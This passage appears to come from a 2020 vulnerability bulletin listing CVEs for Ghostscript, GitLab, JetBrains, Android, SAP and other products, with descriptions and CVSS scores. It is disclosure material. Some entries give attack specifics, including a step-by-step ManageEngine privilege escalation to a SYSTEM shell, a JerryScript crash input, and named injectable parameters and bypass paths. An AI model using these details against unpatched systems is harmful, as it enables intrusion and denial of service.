JIT optimizations involving the Javascript arguments object could confuse later optimizations. This risk was already mitigated by various precautions in the code, resulting in this bug rated at only moderate severity. This vulnerability affects Firefox ESR < 78.1, Firefox < 79, and Thunderbird < 78.1.
2020-08-10
9.3

CVE-2020-15656
SUSE
MISC
MISC
MISC
MISC

opensuse — tumbleweed
A Incorrect Default Permissions vulnerability in the packaging of inn in openSUSE Leap 15.2, openSUSE Tumbleweed, openSUSE Leap 15.1 allows local attackers with control of the new user to escalate their privileges to root. This issue affects: openSUSE Leap 15.2 inn version 2.6.2-lp152.1.26 and prior versions. openSUSE Tumbleweed inn version 2.6.2-4.2 and prior versions. openSUSE Leap 15.1 inn version 2.5.4-lp151.3.3.1 and prior versions.
2020-08-07
7.2

CVE-2020-8026
CONFIRM

passmark — burnintest
An issue was discovered in PassMark BurnInTest through 9.1, OSForensics through 7.1, and PerformanceTest through 10. The driver’s IOCTL request handler attempts to copy the input buffer onto the stack without checking its size and can cause a buffer overflow. This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys.
2020-08-07
7.2

CVE-2020-15479
MISC
MISC
MISC
MISC

passmark — burnintest
An issue was discovered in PassMark BurnInTest through 9.1, OSForensics through 7.1, and PerformanceTest through 10. The kernel driver exposes IOCTL functionality that allows low-privilege users to map arbitrary physical memory into the address space of the calling process. This could lead to arbitrary Ring-0 code execution and escalation of privileges. This affects DirectIo32.sys and DirectIo64.sys.
2020-08-07
7.2

CVE-2020-15480
MISC
MISC
MISC
MISC

robotemi — robox_os
Authentication Bypass Using an Alternate Path or Channel in Robotemi Global Ltd Temi Firmware up to 20190419.165201, Launcher OS prior to 11969-13146, Robox OS prior to 117.21-119.24, and their Android phone app prior to 1.3.3-1.3.7931 allows remote attackers to listen in on any ongoing calls between temi robots and their users if they can brute-force/guess a six-digit value.
2020-08-07
7.5

CVE-2020-16169
MISC
MISC

robotemi — temi
Use of Hard-coded Credentials in Robotemi Global Ltd Temi Firmware up to 20190419.165201, Launcher OS prior to 11969-13146, Robox OS prior to 117.21-119.24, and their Android phone app prior to 1.3.3-1.3.7931 allows remote attackers to gain raised privileges on the temi and have it automatically answer the attacker’s calls, granting audio, video, and motor control.
2020-08-11
7.5

CVE-2020-16170
MISC
MISC

sap — netweaver
SAP NetWeaver AS JAVA, versions – (ENGINEAPI 7.10; WSRM 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; J2EE-FRMW 7.10, 7.11), does not perform any authentication checks for a web service allowing the attacker to send several payloads and leading to complete denial of service.
2020-08-12
7.8

CVE-2020-6309
MISC
MISC

sap — netweaver_knowledge_management
SAP NetWeaver (Knowledge Management), versions – 7.30, 7.31, 7.40, 7.50, allows the automatic execution of script content in a stored file due to inadequate filtering with the accessing user’s privileges. If the accessing user has administrative privileges, then the execution of the script content could result in complete compromise of system confidentiality, integrity and availability, leading to Stored Cross Site Scripting.
2020-08-12
8.5

CVE-2020-6284
MISC
MISC

securenvoy — securmail
SecurEnvoy SecurMail 9.3.503 allows attackers to upload executable files and achieve OS command execution via a crafted SecurEnvoyReply cookie.
2020-08-07
9.3

CVE-2020-13376
MISC
MISC

thedaylightstudio — fuel_cms
FUEL CMS 1.4.7 allows SQL Injection via the col parameter to /pages/items, /permissions/items, or /navigation/items.
2020-08-13
7.5

CVE-2020-17463
MISC
MISC
MISC
CONFIRM

tp-link — tl-ps310u_firmware
TP-Link USB Network Server TL-PS310U devices before 2.079.000.t0210 allow an attacker on the same network to bypass authentication via a web-administration request that lacks a password parameter.
2020-08-07
8.3

CVE-2020-15055
MISC

turcom — trcwifizone
Turcom TRCwifiZone through 2020-08-10 allows authentication bypass by visiting manage/control.php and ignoring 302 Redirect responses.
2020-08-11
7.5

CVE-2020-17466
MISC
MISC

zohocorp — manageengine_adselfservice_plus
An elevation of privilege vulnerability exists in ManageEngine ADSelfService Plus before build 6003 because it does not properly enforce user privileges associated with a Certificate dialog. This vulnerability could allow an unauthenticated attacker to escalate privileges on a Windows host. An attacker does not require any privilege on the target system in order to exploit this vulnerability. One option is the self-service option on the Windows login screen. Upon selecting this option, the thick-client software is launched, which connects to a remote ADSelfService Plus server to facilitate self-service operations. An unauthenticated attacker having physical access to the host could trigger a security alert by supplying a self-signed SSL certificate to the client. The View Certificate option from the security alert allows an attacker to export a displayed certificate to a file. This can further cascade to a dialog that can open Explorer as SYSTEM. By navigating from Explorer to windowssystem32, cmd.exe can be launched as a SYSTEM.
2020-08-11
10

CVE-2020-11552
MISC
MISC
FULLDISC
CONFIRM
MISC
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description
Published
CVSS Score
Source & Patch Info

accuity — firco_continuity
A stored Cross-site scripting (XSS) vulnerability in Firco Continuity 6.2.0.0 allows remote unauthenticated attackers to inject arbitrary web script or HTML through the username field of the login page.
2020-08-12
4.3

CVE-2020-16186
MISC

apache — http_server
Apache HTTP Server versions 2.4.20 to 2.4.43 When trace/debug was enabled for the HTTP/2 module and on certain traffic edge patterns, logging statements were made on the wrong connection, causing concurrent use of memory pools. Configuring the LogLevel of mod_http2 above “info” will mitigate this vulnerability for unpatched servers.
2020-08-07
4.3

CVE-2020-11993
MISC
MLIST
MLIST
MLIST
GENTOO
CONFIRM

apache — http_server
Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the ‘Cache-Digest’ header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via “H2Push off” will mitigate this vulnerability for unpatched servers.
2020-08-07
5

CVE-2020-9490
MISC
MLIST
MLIST
MLIST
GENTOO
CONFIRM

apache — http_server
IP address spoofing when proxying using mod_remoteip and mod_rewrite For configurations using proxying with mod_remoteip and certain mod_rewrite rules, an attacker could spoof their IP address for logging and PHP scripts. Note this issue was fixed in Apache HTTP Server 2.4.24 but was retrospectively allocated a low severity CVE in 2020.
2020-08-07
4.3

CVE-2020-11985
MISC
GENTOO

apache — wicket
By crafting a special URL it is possible to make Wicket deliver unprocessed HTML templates. This would allow an attacker to see possibly sensitive information inside a HTML template that is usually removed during rendering. Affected are Apache Wicket versions 7.16.0, 8.8.0 and 9.0.0-M5
2020-08-11
5

CVE-2020-11976
MISC

artifex — ghostscript
A buffer overflow vulnerability in pj_common_print_page() in devices/gdevpjet.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16288
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in GetNumSameData() in contrib/lips4/gdevlips.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-17538
MISC
MISC

artifex — ghostscript
A use-after-free vulnerability in xps_finish_image_path() in devices/vector/gdevxps.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted PDF file. This is fixed in v9.51.
2020-08-13
6.8

CVE-2020-16303
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in jetp3852_print_page() in devices/gdev3852.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted PDF file. This is fixed in v9.51.
2020-08-13
6.8

CVE-2020-16302
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in lxm5700m_print_page() in devices/gdevlxm.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted eps file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16309
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in p_print_image() in devices/gdevcdj.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16308
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in epsc_print_page() in devices/gdevepsc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16294
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in tiff12_print_page() in devices/gdevtfnx.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16300
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in lprn_is_black() in contrib/lips4/gdevlprn.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16287
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in image_render_color_thresh() in base/gxicolor.c of Artifex Software GhostScript v9.50 allows a remote attacker to escalate privileges via a crafted eps file. This is fixed in v9.51.
2020-08-13
6.8

CVE-2020-16304
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in cif_print_page() in devices/gdevcif.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16289
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in FloydSteinbergDitheringC() in contrib/gdevbjca.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16297
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in okiibm_print_page1() in devices/gdevokii.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16301
MISC
MISC

artifex — ghostscript
A null pointer dereference vulnerability in compose_group_nonknockout_nonblend_isolated_allmask_common() in base/gxblend.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16293
MISC
MISC

artifex — ghostscript
A Division by Zero vulnerability in bj10v_print_page() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16299
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in mj_color_correct() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16298
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in pcx_write_rle() in contrib/japanese/gdev10v.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16305
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in GetNumWrongData() in contrib/lips4/gdevlips.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16296
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in contrib/gdevdj9.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16291
MISC
MISC

artifex — ghostscript
A null pointer dereference vulnerability in clj_media_size() in devices/gdevclj.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16295
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in jetp3852_print_page() in devices/gdev3852.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16290
MISC
MISC

artifex — ghostscript
A buffer overflow vulnerability in mj_raster_cmd() in contrib/japanese/gdevmjc.c of Artifex Software GhostScript v9.50 allows a remote attacker to cause a denial of service via a crafted PDF file. This is fixed in v9.51.
2020-08-13
4.3

CVE-2020-16292
MISC
MISC

avaya — ip_office
A vulnerability was discovered in the web interface component of IP Office that may potentially allow a remote, unauthenticated user with network access to gain sensitive information. Affected versions of IP Office include: 9.x, 10.0 through 10.1.0.7 and 11.0 through 11.0.4.2.
2020-08-07
5

CVE-2019-7005
CONFIRM

carson-saint — saint_security_suite
A cross-site scripting (XSS) vulnerability in the Credential Manager component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.
2020-08-10
4.3

CVE-2020-16275
CONFIRM

carson-saint — saint_security_suite
A cross-site scripting (XSS) vulnerability in the Permissions component in SAINT Security Suite 8.0 through 9.8.20 could allow arbitrary script to run in the context of a logged-in user when the user clicks on a specially crafted link.
2020-08-10
4.3

CVE-2020-16278
CONFIRM

carson-saint — saint_security_suite
An SQL injection vulnerability in the Assets component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.
2020-08-10
6.5

CVE-2020-16276
CONFIRM

carson-saint — saint_security_suite
An SQL injection vulnerability in the Analytics component of SAINT Security Suite 8.0 through 9.8.20 allows a remote, authenticated attacker to gain unauthorized access to the database.
2020-08-10
6.5

CVE-2020-16277
CONFIRM

combodo — itop
A function in Combodo iTop contains a vulnerability of Broken Access Control, which allows unauthorized attacker to inject command and disclose system information.
2020-08-10
5

CVE-2020-12777
MISC

combodo — itop
A security misconfiguration exists in Combodo iTop, which can expose sensitive information.
2020-08-10
5

CVE-2020-12780
MISC

combodo — itop
Combodo iTop contains a cross-site request forgery (CSRF) vulnerability, attackers can execute specific commands via malicious site request forgery.
2020-08-10
6.8

CVE-2020-12781
MISC

combodo — itop
Combodo iTop does not validate inputted parameters, attackers can inject malicious commands and launch XSS attack.
2020-08-10
4.3

CVE-2020-12778
MISC

cs2-network — p2p
CS2 Network P2P through 3.x, as used in millions of Internet of Things devices, suffers from an information exposure flaw that exposes user session data to supernodes in the network, as demonstrated by passively eavesdropping on user video/audio streams, capturing credentials, and compromising devices.
2020-08-10
4.3

CVE-2020-9526
MISC
MISC

cs2-network — p2p
CS2 Network P2P through 3.x, as used in millions of Internet of Things devices, suffers from an authentication flaw that allows remote attackers to perform a man-in-the-middle attack, as demonstrated by eavesdropping on user video/audio streams, capturing credentials, and compromising devices.
2020-08-10
6.8

CVE-2020-9525
MISC
MISC

deltaww — tpeditor
Delta Electronics TPEditor Versions 1.97 and prior. A heap-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.
2020-08-07
6.8

CVE-2020-16223
MISC
MISC

deltaww — tpeditor
Delta Electronics TPEditor Versions 1.97 and prior. An improper input validation may be exploited by processing a specially crafted project file not validated when the data is entered by a user. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.
2020-08-07
6.8

CVE-2020-16227
MISC
MISC

deltaww — tpeditor
Delta Electronics TPEditor Versions 1.97 and prior. An out-of-bounds read may be exploited by processing specially crafted project files. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.
2020-08-07
6.8

CVE-2020-16219
MISC
MISC
MISC

deltaww — tpeditor
Delta Electronics TPEditor Versions 1.97 and prior. A write-what-where condition may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.
2020-08-07
6.8

CVE-2020-16225
MISC
MISC

deltaww — tpeditor
Delta Electronics TPEditor Versions 1.97 and prior. A stack-based buffer overflow may be exploited by processing a specially crafted project file. Successful exploitation of this vulnerability may allow an attacker to read/modify information, execute arbitrary code, and/or crash the application.
2020-08-07
6.8

CVE-2020-16221
MISC
MISC

digitus — da-70254_firmware
DIGITUS DA-70254 4-Port Gigabit Network Hub 2.073.000.E0008 devices allow an attacker on the same network to denial-of-service the device via long input values.
2020-08-07
6.1

CVE-2020-15065
MISC

django-celery-results_project — django-celery-results
django-celery-results through 1.2.1 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database.
2020-08-11
5

CVE-2020-17495
MISC

f2fs-tools_project — f2fs-tools
An exploitable code execution vulnerability exists in the file system checking functionality of fsck.f2fs 1.12.0. A specially crafted f2fs file can cause a logic flaw and out-of-bounds heap operations, resulting in code execution. An attacker can provide a malicious file to trigger this vulnerability.
2020-08-10
6.8

CVE-2020-6070
MISC

firejail_project — firejail
Firejail through 0.9.62 does not honor the — end-of-options indicator after the –output option, which may lead to command injection.
2020-08-11
4.6

CVE-2020-17367
SUSE
MISC
MISC
DEBIAN

frappe — erpnext
An SQL injection vulnerability exists in the frappe.desk.reportview.get functionality of ERPNext 11.1.38. A specially crafted HTTP request can cause an SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.
2020-08-10
6.5

CVE-2020-6145
MISC

getsymphony — symphony_cms
content/content.blueprintsevents.php in Symphony CMS 3.0.0 allows XSS via fields[‘name’] to appendSubheading.
2020-08-11
4.3

CVE-2020-15071
MISC

gitlab — gitlab
In GitLab before 13.0.12, 13.1.6 and 13.2.3 using a branch with a hexadecimal name could override an existing hash.
2020-08-10
5.5

CVE-2020-13293
CONFIRM
MISC
MISC

gitlab — gitlab
In GitLab before 13.0.12, 13.1.6 and 13.2.3, it is possible to bypass E-mail verification which is required for OAuth Flow.
2020-08-10
5.5

CVE-2020-13292
CONFIRM
MISC
MISC

gitlab — gitlab
For GitLab before 13.0.12, 13.1.6, 13.2.3 user controlled git configuration settings can be modified to result in Server Side Request Forgery.
2020-08-13
4

CVE-2020-13286
CONFIRM
MISC
MISC

gitlab — gitlab
For GitLab before 13.0.12, 13.1.6, 13.2.3 a denial of service exists in the project import feature
2020-08-13
4

CVE-2020-13281
CONFIRM
MISC
MISC

gitlab — gitlab
In GitLab before 13.0.12, 13.1.6 and 13.2.3, access grants were not revoked when a user revoked access to an application.
2020-08-10
5.5

CVE-2020-13294
CONFIRM
MISC
MISC

gitlab — runner
For GitLab Runner before 13.0.12, 13.1.6, 13.2.3, by replacing dockerd with a malicious server, the Shared Runner is susceptible to SSRF.
2020-08-10
6.5

CVE-2020-13295
CONFIRM
MISC
MISC

google — android
In postInstantAppNotif of InstantAppNotifier.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154627439
2020-08-11
4.9

CVE-2020-0248
MISC

google — android
In updatePreferenceIntents of AccountTypePreferenceLoader, there is a possible confused deputy attack due to a race condition. This could lead to local escalation of privilege and launching privileged activities with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-8.0Android ID: A-150946634
2020-08-11
6.9

CVE-2020-0238
MISC

google — android
In getDocumentMetadata of DocumentsContract.java, there is a possible disclosure of location metadata from a file due to a permissions bypass. This could lead to local information disclosure from a file (eg. a photo) containing location metadata with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10Android ID: A-151095863
2020-08-11
4.9

CVE-2020-0239
MISC

google — android
In Threshold::getHistogram of ImageProcessHelper.java, there is a possible crash loop due to an uncaught exception. This could lead to local denial of service with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1Android ID: A-156087409
2020-08-11
4.9

CVE-2020-0247
MISC

google — android
In postInstantAppNotif of InstantAppNotifier.java, there is a possible permission bypass due to a PendingIntent error. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-8.0 Android-8.1 Android-9Android ID: A-154719656
2020-08-11
4.9

CVE-2020-0249
MISC

google — android
In requestCellInfoUpdateInternal of PhoneInterfaceManager.java, there is a missing permission check. This could lead to local information disclosure of location data with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154934934
2020-08-11
4.9

CVE-2020-0250
MISC

google — android
In stopZygoteLocked of AppZygote.java, there is an insufficient cleanup. This could lead to local information disclosure in the application that is started next with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-157598956
2020-08-11
4.9

CVE-2020-0258
MISC
MISC

google — android
There is a possible out of bounds read due to an incorrect bounds check.Product: AndroidVersions: Android SoCAndroid ID: A-152225183
2020-08-11
6.4

CVE-2020-0260
MISC

google — asylo
A buffer length validation vulnerability in Asylo versions prior to 0.6.0 allows an attacker to read data they should not have access to. The ‘enc_untrusted_recvfrom’ function generates a return value which is deserialized by ‘MessageReader’, and copied into three different ‘extents’. The length of the third ‘extents’ is controlled by the outside world, and not verified on copy, allowing the attacker to force Asylo to copy trusted memory data into an untrusted buffer of significantly small length.. We recommend updating Asylo to version 0.6.0 or later.
2020-08-12
4

CVE-2020-8905
CONFIRM

google — asylo
An arbitrary memory overwrite vulnerability in the trusted memory of Asylo exists in versions prior to 0.6.0. As the ecall_restore function fails to validate the range of the output_len pointer, an attacker can manipulate the tmp_output_len value and write to an arbitrary location in the trusted (enclave) memory. We recommend updating Asylo to version 0.6.0 or later.
2020-08-12
5.5

CVE-2020-8904
CONFIRM

handysoft — hslogin2.dll
hslogin2.dll ActiveX Control in Groupware contains a vulnerability that could allow remote files to be downloaded and executed by setting the arguments to the activex method. This is due to a lack of integrity verification of the policy files referenced in the update process, and a remote attacker could induce a user to crafted web page, causing damage such as malicious code infection.
2020-08-07
6.8

CVE-2020-7810
MISC
MISC

huawei — fusioncompute
FusionCompute 8.0.0 have local privilege escalation vulnerability. A local, authenticated attacker could perform specific operations to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege and compromise the service.
2020-08-10
4.6

CVE-2020-9078
MISC

huawei — fusionsphere_openstack
FusionSphere OpenStack 8.0.0 have a protection mechanism failure vulnerability. The product incorrectly uses a protection mechanism. An attacker has to find a way to exploit the vulnerability to conduct directed attacks against the affected product.
2020-08-11
5.8

CVE-2020-9079
MISC

huawei — mate_20_firmware
HUAWEI Mate 20 versions Versions earlier than 10.1.0.160(C00E160R3P8);HUAWEI Mate 20 Pro versions Versions earlier than 10.1.0.270(C431E7R1P5),Versions earlier than 10.1.0.270(C635E3R1P5),Versions earlier than 10.1.0.273(C636E7R2P4);HUAWEI Mate 20 X versions Versions earlier than 10.1.0.160(C00E160R2P8);HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8);HUAWEI Mate 20 RS versions Versions earlier than 10.1.0.160(C786E160R3P8);HonorMagic2 versions Versions earlier than 10.0.0.187(C00E61R2P11);Honor20 versions Versions earlier than 10.0.0.175(C00E58R4P11);Honor20 PRO versions Versions earlier than 10.0.0.194(C00E62R8P12);HonorMagic2 versions Versions earlier than 10.0.0.187(C00E61R2P11);HonorV20 versions Versions earlier than 10.0.0.188(C00E62R2P11) have an improper authentication vulnerability. The system does not properly sign certain encrypted file, the attacker should gain the key used to encrypt the file, successful exploit could cause certain file be forged
2020-08-11
4.6

CVE-2020-9244
MISC

huawei — mate_30_firmware
HUAWEI Mate 30 with versions earlier than 10.1.0.150(C00E136R5P3) have a denial of service vulnerability. The system does not properly limit the depth of recursion, an attacker should trick the user installing and execute a malicious application. Successful exploit could cause a denial of service condition.
2020-08-10
4.3

CVE-2020-9243
MISC

huawei — p30_firmware
HUAWEI P30 versions Versions earlier than 10.1.0.160(C00E160R2P11);HUAWEI P30 Pro versions Versions earlier than 10.1.0.160(C00E160R2P8) have a denial of service vulnerability. Certain system configuration can be modified because of improper authorization. The attacker could trick the user installing and executing a malicious application, successful exploit could cause a denial of service condition of PHONE function.
2020-08-10
4.3

CVE-2020-9245
MISC

ibm — event_streams
IBM Event Streams 10.0.0 could allow an authenticated user to perform tasks to a schema due to improper authentication validation. IBM X-Force ID: 186233.
2020-08-14
6.5

CVE-2020-4662
XF
CONFIRM

ibm — jazz_reporting_service
IBM Jazz Reporting Service 6.0.6, 6.0.6.1, and 7.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 182717.
2020-08-10
4.3

CVE-2020-4533
XF
CONFIRM

ibm — jazz_reporting_service
IBM Jazz Reporting Service 6.0.2, 6.0.6, 6.0.6.1, 7.0, and 7.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
2020-08-10
4.3

CVE-2020-4539
XF
CONFIRM

ibm — jazz_reporting_service
IBM Jazz Reporting Service 7.0 and 7.0.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 183039.
2020-08-10
4.3

CVE-2020-4541
XF
CONFIRM

ibm — maximo_asset_management
IBM Maximo Asset Management 7.6.0 and 7.6.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing “dot dot” sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 167288.
2020-08-13
4

CVE-2019-4582
XF
CONFIRM

ibm — qradar_security_information_and_event_manager
IBM QRadar 7.2.0 through 7.2.9 could allow an authenticated user to disable the Wincollect service which could aid an attacker in bypassing security mechanisms in future attacks. IBM X-Force ID: 181860.
2020-08-11
4

CVE-2020-4485
XF
CONFIRM

ibm — qradar_security_information_and_event_manager
IBM QRadar 7.2.0 thorugh 7.2.9 could allow an authenticated user to overwrite or delete arbitrary files due to a flaw after WinCollect installation. IBM X-Force ID: 181861.
2020-08-11
5.5

CVE-2020-4486
XF
CONFIRM

jenkins — email_extension
Jenkins Email Extension Plugin 2.72 and 2.73 transmits and displays the SMTP password in plain text as part of the global Jenkins configuration form, potentially resulting in its exposure.
2020-08-12
5

CVE-2020-2232
MLIST
CONFIRM

jenkins — flaky_test_handler
A cross-site request forgery (CSRF) vulnerability in Jenkins Flaky Test Handler Plugin 1.0.4 and earlier allows attackers to rebuild a project at a previous git revision.
2020-08-12
4.3

CVE-2020-2237
MLIST
CONFIRM

jenkins — pipeline_maven_integration
A missing permission check in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.
2020-08-12
4

CVE-2020-2233
MLIST
CONFIRM

jenkins — pipeline_maven_integration
A missing permission check in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows users with Overall/Read access to connect to an attacker-specified JDBC URL using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.
2020-08-12
4

CVE-2020-2234
MLIST
CONFIRM

jenkins — pipeline_maven_integration
A cross-site request forgery (CSRF) vulnerability in Jenkins Pipeline Maven Integration Plugin 3.8.2 and earlier allows attackers to connect to an attacker-specified JDBC URL using attacker-specified credentials IDs obtained through another method, potentially capturing credentials stored in Jenkins.
2020-08-12
4.3

CVE-2020-2235
MLIST
CONFIRM

jerryscript — jerryscript
** DISPUTED ** JerryScript through 2.3.0 allows stack consumption via function a(){new new Proxy(a,{})}JSON.parse(“[]”,a). NOTE: the vendor states that the problem is the lack of the –stack-limit option.
2020-08-13
6.8

CVE-2020-24345
MISC

jetbrains — kotlin
In JetBrains Kotlin from 1.4-M1 to 1.4-RC (as Kotlin 1.3.70 is not affected by the issue. Fixed version is 1.4.0) there is a script-cache privilege escalation vulnerability due to kotlin-main-kts cached scripts in the system temp directory, which is shared by all users by default.
2020-08-08
6.5

CVE-2020-15824
MISC
MISC

jetbrains — teamcity
In JetBrains TeamCity before 2020.1, users are able to assign more permissions than they have.
2020-08-08
4

CVE-2020-15826
MISC
MISC

jetbrains — teamcity
In JetBrains TeamCity before 2020.1.1, project parameter values can be retrieved by a user without appropriate permissions.
2020-08-08
4

CVE-2020-15828
MISC
MISC

jetbrains — teamcity
In JetBrains TeamCity before 2019.2.3, password parameters could be disclosed via build logs.
2020-08-08
5

CVE-2020-15829
MISC
MISC

jetbrains — teamcity
In JetBrains TeamCity before 2020.1, users with the Modify Group permission can elevate other users’ privileges.
2020-08-08
6.5

CVE-2020-15825
MISC
MISC

jetbrains — teamcity
JetBrains TeamCity before 2019.2.3 is vulnerable to reflected XSS in the administration UI.
2020-08-08
4.3

CVE-2020-15831
MISC
MISC

jetbrains — teamcity
JetBrains TeamCity before 2019.2.3 is vulnerable to stored XSS in the administration UI.
2020-08-08
4.3

CVE-2020-15830
MISC
MISC

jetbrains — toolbox
In JetBrains ToolBox version 1.17 before 1.17.6856, the set of signature verifications omitted the jetbrains-toolbox.exe file.
2020-08-08
5

CVE-2020-15827
MISC
MISC

jetbrains — upsource
In JetBrains Upsource before 2020.1, information disclosure is possible because of an incorrect user matching algorithm.
2020-08-08
5

CVE-2019-19704
MISC
MISC

jetbrains — youtrack
In JetBrains YouTrack before 2020.2.6881, a user without permission is able to create an article draft.
2020-08-08
4

CVE-2020-15821
MISC
MISC

jetbrains — youtrack
In JetBrains YouTrack before 2020.1.1331, an external user could execute commands against arbitrary issues.
2020-08-08
6.5

CVE-2020-15817
MISC
MISC

jetbrains — youtrack
JetBrains YouTrack before 2020.2.8873 is vulnerable to SSRF in the Workflow component.
2020-08-08
5

CVE-2020-15823
MISC
MISC

jetbrains — youtrack
In JetBrains YouTrack before 2020.2.6881, the markdown parser could disclose hidden file existence.
2020-08-08
5

CVE-2020-15820
MISC
MISC

jetbrains — youtrack
JetBrains YouTrack before 2020.2.10643 was vulnerable to SSRF that allowed scanning internal ports.
2020-08-08
5

CVE-2020-15819
MISC
MISC

jetbrains — youtrack
In JetBrains YouTrack before 2020.2.8527, the subtasks workflow could disclose issue existence.
2020-08-08
5

CVE-2020-15818
MISC
MISC

lindy-international — 42633_firmware
